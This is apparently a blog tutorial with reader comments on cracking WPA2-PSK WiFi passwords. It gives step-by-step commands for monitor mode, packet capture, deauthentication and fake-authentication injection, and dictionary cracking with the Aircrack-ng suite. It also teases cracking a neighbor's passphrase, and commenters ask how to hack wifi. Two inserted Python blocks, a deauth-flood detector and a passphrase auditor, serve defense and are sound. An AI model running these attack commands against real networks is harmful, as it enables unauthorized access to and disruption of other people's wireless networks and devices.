Cracking a WPA2 WiFi Password with Aircrack-ng

September 1, 2015 | Views: 163408


Hola amigos…

Aim: To crack a WPA2-PSK encrypted WiFi password using Aircrack-ng.

Requirements:

  • If you’re using Kali Linux in VMware or another virtual machine, you need a compatible USB WiFi receiver (I’m using an Atheros AR9271 wireless network adapter), because WiFi connections don’t show up in virtual machines; they appear as LAN connections instead. You also need it to do packet injection (we’ll discuss packet injection and why it is needed in a few minutes).
  • If you dual-booted your system and/or are using Ubuntu or Mint Linux, then you’re good to go.

Wait…wait…

You also need a word list comprising all the possible combinations of pass-phrases. You can download some of them from Torrentz or click here.

You need the Aircrack-ng suite (in Kali Linux, it comes as a built-in tool). For others, you can get it by doing “sudo apt-get install aircrack-ng”

 

Moving ahead, assuming that you have met the above requirements…

 

Procedure:

Attach the USB WiFi receiver to the virtual machine (if you’re using one). Open up your terminal as root and type “ifconfig”. This will show you all the networking interfaces connected to your device.

Now, type “airmon-ng start wlan0 mon0”. This command will push your wireless interface into monitor mode. Here, ‘airmon-ng’ is a traffic monitoring tool, ‘wlan0’ is your wireless interface, ‘mon0’ is monitor mode and ‘start’ will start the monitor mode on the particular interface.

After entering this command, a list of process IDs that can cause trouble during the process pops up, so kill those processes by typing “kill <pid>”. In my case, “kill 3130 3227 4210 4236”. Now, type “ifconfig” and this will show the newly set monitoring interface, i.e., mon0.

Next, type “airodump-ng mon0” (airodump-ng is a WiFi packet capturing tool) and this will start capturing all packets. From the captured packets, select your target and note its ‘bssid’ (bssid = basic service set identifier) and channel. Stop the capture using “Ctrl+C”.

Now, to start capturing the packets of your target network, type the following command “airodump-ng -c <channel> -w <name> --bssid <bssid> mon0” (-c = channel of your target, -w = writes the captured data to a file, name = name associated with the file, --bssid = basic service set ID of your target, mon0 = interface on which capturing takes place).

In my case, “airodump-ng -c 11 -w wifi --bssid 10:FE:ED:2E:29:34 mon0”, which will start the capturing of packets.

While the capturing of packets goes on, open a new terminal as root and type “aireplay-ng -0 0 -a <bssid> mon0” (aireplay-ng = tool for deauthentication, fake authentication and other packet injections, -0 = number associated with deauthentication, 0 = deauth count, -a = bssid).

Here, we’re trying to send a deauthentication request. In my case, the command looks like “aireplay-ng -0 0 -a 10:FE:ED:2E:29:34 mon0”. After a few seconds, stop it using Ctrl+C.

You can also do the fake authentication request by typing “aireplay-ng -1 0 -a 10:FE:ED:2E:29:34 -h 20:EF:FD:3F:36:45 wlan0” (-1 = fake authentication request number, 0 = count, -h = host bssid. The host bssid doesn’t really matter – some fake id would do the work).

If you look at the other terminal, we have successfully captured the WPA handshake.
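From the defender's side, the deauthentication burst used above is visible on the air as an abnormal rate of deauth frames for one BSSID. The following is an added example, not part of the original tutorial: a sliding-window detector run over constructed frame records. The record format, MAC addresses, window and threshold are all assumptions made for illustration.

```python
from collections import defaultdict, deque

BROADCAST = "ff:ff:ff:ff:ff:ff"

def build_sample():
    """Constructed records, not real capture output. Assumed line format:
    <seconds> <frame subtype> <source MAC> <destination MAC> <BSSID>"""
    ap_a, ap_b = "02:00:00:00:00:01", "02:00:00:00:00:02"
    lines = [
        f"100.0 beacon {ap_a} {BROADCAST} {ap_a}",
        f"101.0 deauth 02:00:00:00:00:aa {ap_b} {ap_b}",  # one client leaving normally
        "garbled record",                                  # malformed, must be skipped
    ]
    # A dense burst of deauth frames aimed at every client of ap_a.
    lines += [f"{110 + i * 0.1:.1f} deauth {ap_a} {BROADCAST} {ap_a}" for i in range(20)]
    return "\n".join(lines)

def parse_frames(text):
    """Parse records into (ts, subtype, src, dst, bssid) tuples, sorted by time."""
    frames = []
    for line in text.splitlines():
        parts = line.lower().split()
        if len(parts) != 5:
            continue
        try:
            frames.append((float(parts[0]), *parts[1:]))
        except ValueError:
            continue  # timestamp field was not a number
    return sorted(frames)

def detect_deauth_floods(frames, window=5.0, threshold=10):
    """Return {bssid: details} for each BSSID with >= threshold deauths in window seconds."""
    recent = defaultdict(deque)  # bssid -> (timestamp, destination) of recent deauths
    alerts = {}
    for ts, subtype, _src, dst, bssid in frames:
        if subtype != "deauth":
            continue
        seen = recent[bssid]
        seen.append((ts, dst))
        while seen and ts - seen[0][0] > window:
            seen.popleft()  # drop frames that fell out of the window
        if len(seen) >= threshold and bssid not in alerts:
            alerts[bssid] = {
                "first_seen": seen[0][0],
                "count": len(seen),
                "broadcast": any(d == BROADCAST for _, d in seen),
            }
    return alerts

if __name__ == "__main__":
    print(detect_deauth_floods(parse_frames(build_sample())))
```

Detection only tells you it happened; enabling 802.11w Protected Management Frames on the access point and clients makes forged deauthentication frames ineffective.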

You can now stop the capturing using Ctrl+C and type “ls”. This will bring up all the current directories and files. Select a file with “.cap” extension and type the following command “aircrack-ng -w <full location of the word list> <name of the file>” (aircrack-ng is a tool that helps in cracking the password).

In my case, the command looks like “aircrack-ng -w /home/upendra/passwords.lst wifi-01.cap”. Now, it starts finding a suitable passphrase.

Wait…wait and wait…(Password strength and cracking time are directly proportional.) Patience pays off …

In the end,

Key found.
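Because the attack only succeeds when the passphrase is in the word list or in a small enough search space, a network owner can audit a passphrase before using it. The following is an added example, not part of the original tutorial: it classifies a passphrase as digits only, joined dictionary words, or neither, and gives an upper bound on the search space. The word list, the assumed attacker word-list size and the guess rate are illustrative assumptions, not measured figures.

```python
import math
import string

# Constructed mini word list; a real audit would load a much larger one.
COMMON_WORDS = {"blue", "sky", "home", "wifi", "admin", "love", "dragon", "net"}
ASSUMED_WORDLIST_SIZE = 100_000       # assumption: words an attacker's list holds
ASSUMED_GUESSES_PER_SECOND = 100_000  # assumption, not a measured cracking rate

def split_into_words(text, words=COMMON_WORDS):
    """Fewest known words that concatenate exactly to text, or None."""
    text = text.lower()
    best = {0: []}  # prefix length -> shortest word split found so far
    for end in range(1, len(text) + 1):
        for start in range(end):
            if start in best and text[start:end] in words:
                candidate = best[start] + [text[start:end]]
                if end not in best or len(candidate) < len(best[end]):
                    best[end] = candidate
    return best.get(len(text))

def audit_passphrase(passphrase):
    """Classify a WPA2-PSK passphrase and bound the search space from above."""
    # WPA2-PSK passphrases are 8 to 63 printable ASCII characters.
    if not 8 <= len(passphrase) <= 63 or not all(32 <= ord(c) <= 126 for c in passphrase):
        return {"valid": False}
    words = split_into_words(passphrase)
    if passphrase.isdigit():
        pattern, space = "digits only", 10 ** len(passphrase)
    elif words:
        pattern, space = "joined dictionary words", ASSUMED_WORDLIST_SIZE ** len(words)
    else:
        # Upper bound only: count the character classes actually used.
        charset = sum(size for size, chars in (
            (26, string.ascii_lowercase), (26, string.ascii_uppercase),
            (10, string.digits), (33, string.punctuation + " "),
        ) if any(c in chars for c in passphrase))
        pattern, space = "no simple pattern", charset ** len(passphrase)
    return {
        "valid": True,
        "pattern": pattern,
        "bits": round(math.log2(space), 1),
        "seconds_to_exhaust": space / ASSUMED_GUESSES_PER_SECOND,
    }

if __name__ == "__main__":
    for sample in ("9876543210", "blueskyhome", "q7#Vr2!mXz9&Lp4w"):  # constructed samples
        print(sample, audit_passphrase(sample))
```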

 

“Yeah, everything works great but my neighbor uses his mobile number as a pass key and sometimes some random combination of specific words. How can I create a custom dictionary or word list of my own so that I could crack his password???”

Coming up, stay tuned …

Point to remember:  “With great power comes great responsibility.”

– Thank you –

54 Comments
  1. Which version of Kali Linux are you using? Because the commands “airodump-ng mon0” and “airmon-ng start wlan0 mon” do not work for me. Instead, I typed “airmon-ng start wlan0” then “airodump-ng wlan0”.

    Also, to kill all the PIDs at the same time you can type this command: “airmon-ng check kill” and that will kill all the PIDs.

  2. Hi Upendra,

    Based on the process, the cracking of the password depends on the list of passwords used? So if the password is not in the list, it cannot break it. Thanks.

  3. what is pid????

  4. My first question is, can I hack wifi with laptop built-in wifi card? Or I have to purchase the external wifi card if I’m using Kali Linux 2.0 (both if live or dual boot with Windows).

    Second question is, when I typed the command “airmon-ng start wlan0 mon0” I received this thing
    (”
    PHY Interface Driver Chipset

    phy0 wlan0mon b43 non-mac80211 device? (report this!)
    “)
    Can I still hack the wifi?
    Please help @lalit

    • After writing command airodump-ng mon0 I got the answer
      “Interface mon0:
      ioctl(SIOCGIFINDEX) failed: No such device”

    • I am afraid you can’t. You need an external wifi adapter. Make sure it’s supported.
      Secondly, your device may not be named just the same as shown in the tutorial. Mine was “airmon-ng start wlan0mon”.
      With right courage and determination you can. Best of luck.

  5. Hey! Upendra
    Brother, I’m running live Kali Linux 2.0 via bootable USB, is that okay to perform the hack?
    Do I need to install USB wifi receiver? If yes, then on this link {{ https://www.atheros.cz/atheros-wireless-download.php?chipset=64&system=6 }} which one should I go for?
